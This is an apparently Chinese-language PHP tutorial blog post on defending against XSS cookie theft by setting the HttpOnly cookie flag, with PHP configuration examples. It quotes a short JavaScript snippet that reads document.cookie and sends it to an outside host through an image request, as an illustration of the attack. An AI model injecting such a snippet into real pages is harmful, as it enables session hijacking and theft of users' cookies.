编程 PHP

xss防御之php利用httponly防xss攻击

Posted in PHP onMarch 21, 2014

xss的概念就不用多说了，它的危害是极大的，这就意味着一旦你的网站出现xss漏洞，就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持，如果这里面包含了大量敏感信息（身份信息，管理员信息）等，那完了。。。

如下js获取cookie信息：

url=document.top.location.href;
cookie=document.cookie;
c=new Image();
c.src='http://www.test.com/c.php?c='+cookie+'&u='+url;

一般cookie都是从document对象中获取的，现在浏览器在设置Cookie的时候一般都接受一个叫做HttpOnly的参数，跟domain等其他参数一样，一旦这个HttpOnly被设置，你在浏览器的document对象中就看不到Cookie了。

PHP设置HttpOnly：

//在php.ini中，session.cookie_httponly = ture 来开启全局的Cookie的HttpOnly属性
ini_set("session.cookie_httponly", 1);//或者setcookie()的第七个参数设置为true
session_set_cookie_params(0, NULL, NULL, NULL, TRUE);

对于PHP5.1以前版本的PHP通过：

header("Set-Cookie: hidden=value; httpOnly");

最后，HttpOnly不是万能的！

xss防御之php利用httponly防xss攻击

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐

php Smarty 字符比较代码

Feb 27 PHP

php set_time_limit()函数的使用详解

Jun 05 PHP

使用pthreads实现真正的PHP多线程（需PHP5.3以上版本）

May 05 PHP

php数组中包含中文的排序方法

Jun 03 PHP

PHP中使用gettext解决国际化问题的例子（i18n）

Jun 13 PHP

浅谈PHP解析URL函数parse_url和parse_str

Nov 11 PHP

php运行提示：Fatal error Allowed memory size内存不足的解决方法

Dec 17 PHP

Thinkphp中的curd应用实用要点

Jan 04 PHP

PHP中SSO Cookie登录分析和实现

Nov 06 PHP

php+ajax无刷新分页实例详解

Dec 07 PHP

纯PHP代码实现支付宝批量付款

Dec 24 PHP

Yii统计不同类型邮箱数量的方法

Oct 18 PHP

php5.3 goto函数介绍和示例

Mar 21 #PHP

php ctype函数中文翻译和示例

Mar 21 #PHP

php的declare控制符和ticks教程(附示例)

Mar 21 #PHP

php像数组一样存取和修改字符串字符

Mar 21 #PHP

easyui的tabs update正确用法分享

Mar 21 #PHP

php设置session值和cookies的学习示例

Mar 21 #PHP

一个显示效果非常不错的PHP错误、异常处理类

Mar 21 #PHP

You might like

德生PL330测评

2021/03/02 无线电

基于swoole实现多人聊天室

2018/06/14 PHP

php实现获取近几日、月时间示例

2019/07/06 PHP

JQuery处理json与ajax返回JSON实例代码

2014/01/03 Javascript

jquery自定义滚动条插件示例分享

2014/02/21 Javascript

特殊情况下如何获取span里面的值

2014/05/20 Javascript

jQuery实现平滑滚动到指定锚点的方法

2015/03/20 Javascript

JS中正则表达式只有3种匹配模式(没有单行模式)详解

2016/07/28 Javascript

Js查找字符串中出现次数最多的字符及个数实例解析

2016/09/05 Javascript

bootstrap datepicker限定可选时间范围实现方法

2016/09/28 Javascript

jQuery的 $.ajax防止重复提交的两种方法(推荐)

2016/10/14 Javascript

JavaScript实现自定义媒体播放器方法介绍

2017/01/03 Javascript

webpack中的热刷新与热加载的区别

2018/04/09 Javascript

vue中父子组件注意事项,传值及slot应用技巧

2018/05/09 Javascript

vue中接口域名配置为全局变量的实现方法

2018/09/20 Javascript

layer弹出子iframe层父子页面传值的实现方法

2018/11/22 Javascript

js中this的指向问题归纳总结

2018/11/28 Javascript

JavaScript使用面向对象实现的拖拽功能详解

2019/06/12 Javascript

[02:11]2016国际邀请赛中国区预选赛全程回顾

2016/07/01 DOTA

Python使用Supervisor来管理进程的方法

2015/05/28 Python

python中pandas.DataFrame排除特定行方法示例

2017/03/12 Python

浅谈function(函数)中的动态参数

2017/04/30 Python

TensorFlow实现AutoEncoder自编码器

2018/03/09 Python

Python实现将HTML转成PDF的方法分析

2019/05/04 Python

在python plt图表中文字大小调节的方法

2019/07/08 Python

python之yield和Generator深入解析

2019/09/18 Python

Python开发之基于模板匹配的信用卡数字识别功能

2020/01/13 Python

使用 Python 在京东上抢口罩的思路详解

2020/02/27 Python

Python+OpenCV检测灯光亮点的实现方法

2020/11/02 Python

PyTorch预训练Bert模型的示例

2020/11/17 Python

浅谈html5与APP混合开发遇到的问题总结

2018/03/20 HTML / CSS

马克华菲官方商城：Mark Fairwhale

2016/09/04 全球购物

户外活动总结范文

2014/04/30 职场文书

教育专业毕业生推荐信

2014/07/10 职场文书

出租房屋协议书

2014/09/14 职场文书

2016大学生社会实践单位评语

2015/12/01 职场文书